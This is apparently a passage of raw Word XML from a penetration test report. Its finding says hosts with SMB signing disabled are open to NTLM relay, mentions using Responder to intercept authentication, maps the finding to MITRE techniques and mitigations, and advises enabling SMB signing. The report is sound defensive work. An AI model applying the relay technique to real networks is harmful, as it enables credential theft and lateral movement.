                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SC:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="132E7A6D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="52CFD99C">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0139D9" w14:textId="12C83FF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579B627" w:rsidP="0D325B6E" w:rsidRDefault="6579B627" w14:paraId="55979D40" w14:textId="24CCA687">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="6579B627">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7B79DF0" w14:textId="2097D56B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc2df3c067b1947e6">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6694ED1B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>021.002</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7CA3AFB0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: Remote Services -</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6694ED1B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> SMB/Windows shares</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="7F58DF56" w:rsidP="0D325B6E" w:rsidRDefault="7F58DF56" w14:paraId="466B14AF" w14:textId="11F00593">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2de6674271aa4a82">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7F58DF56">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1557.001</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5192F236">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: Adversary in the Middle -</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7F58DF56">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> LLMNR/NBT-NS Poisoning and SMB Relay</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="69B16E3D">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51EBEA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87EC2C1" w:rsidP="0D325B6E" w:rsidRDefault="087EC2C1" w14:paraId="4E63943D" w14:textId="33809C9D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="087EC2C1">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21CF27C" w:rsidP="0D325B6E" w:rsidRDefault="421CF27C" w14:paraId="59273A0B" w14:textId="1620D890">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249f96405ab84d65">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="421CF27C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1037: Filter Network Traffic</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="421CF27C" w:rsidP="0D325B6E" w:rsidRDefault="421CF27C" w14:paraId="12327832" w14:textId="641BDEF2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R027bc2fcbb924bee">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="421CF27C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1042: Disable or Remove Feature or Program</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5732A42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9D9E32" w14:textId="20665064">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70A1644" w14:textId="320A2F2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222B9373" w14:textId="6A7A5723">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1FCE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="265D195D" w14:textId="257A3DE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EB956B2" w:rsidP="0D325B6E" w:rsidRDefault="7EB956B2" w14:paraId="1B450517" w14:textId="762D9D7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EB956B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EB956B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> discovered the listed hosts </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="388BF767">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7EB956B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB signing disabled. This leaves the machines vulnerable to an NTLM relay attack, potentially allowing attackers to steal</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BAEA877">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1388EC16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BAEA877">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">fake authentication to certain </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A502B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BAEA877">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ndow</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BAEA877">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4FFC6C21" w14:textId="4B24D979">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CE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="6A59BDDD" w14:textId="70A6240A">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FCE8D2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FCE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="066BF944" w14:textId="6F993CD8">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adversary to compromise a service account, which can lead to </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a data breach, lateral mo</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vement </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="02A68C74">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>across</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 the network, and potential domain compromise if the account has high privilege</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FEF069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They </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can also cause severe operational disruption by </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odifying</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the service that the service account controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7263C487" w14:textId="1EE77F38">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CE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="3E656B4C" w14:textId="5118930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FCE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="6799D1C5" w14:textId="3640A03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Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70DF1C3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E5D90AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2CD5DEFC">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1E5D90AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esponder to create an NTLM server that can intercept authentication requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4B425CD0" w14:textId="7691EDD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CE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="4B274A00" w14:textId="0A1B587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FCE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="0D63F6B6" w14:textId="05B024CA">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1FCE8D2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4220341E" w:rsidP="0D325B6E" w:rsidRDefault="4220341E" w14:paraId="70D1A214" w14:textId="7421D2E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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220341E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable SMB Signing across all machines on APT’s network</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46E9F86C">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the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46E9F86C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46E9F86C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4220341E" w:rsidP="0D325B6E" w:rsidRDefault="4220341E" w14:paraId="1D905DB7" w14:textId="0AFBE189">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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220341E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If an application requires SMB signing to be disabled, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FD66BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disable NTLM authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="19A29F9A" w14:textId="405B0FC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CE8D2C" w:rsidP="0D325B6E" w:rsidRDefault="1FCE8D2C" w14:paraId="3D64766C" w14:textId="7528E21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CE8D2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EF2740C" w:rsidP="0D325B6E" w:rsidRDefault="1EF2740C" w14:paraId="1244F77F" w14:textId="15F3AE50">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hyperlink r:id="R121b647e27334b53">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1EF2740C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Configure SMB Signing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7FFC15E9" w14:textId="1FBF3FC1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="252A3524" w14:textId="2D2D5FAC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3C16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="7BA7405A" w14:textId="76D6CD44">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261678005" w:id="438294902"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C16D095">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C16D095">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C16D095">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="22EF8E34">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encrypted HTTP Traffic</w:t>
      </w:r>
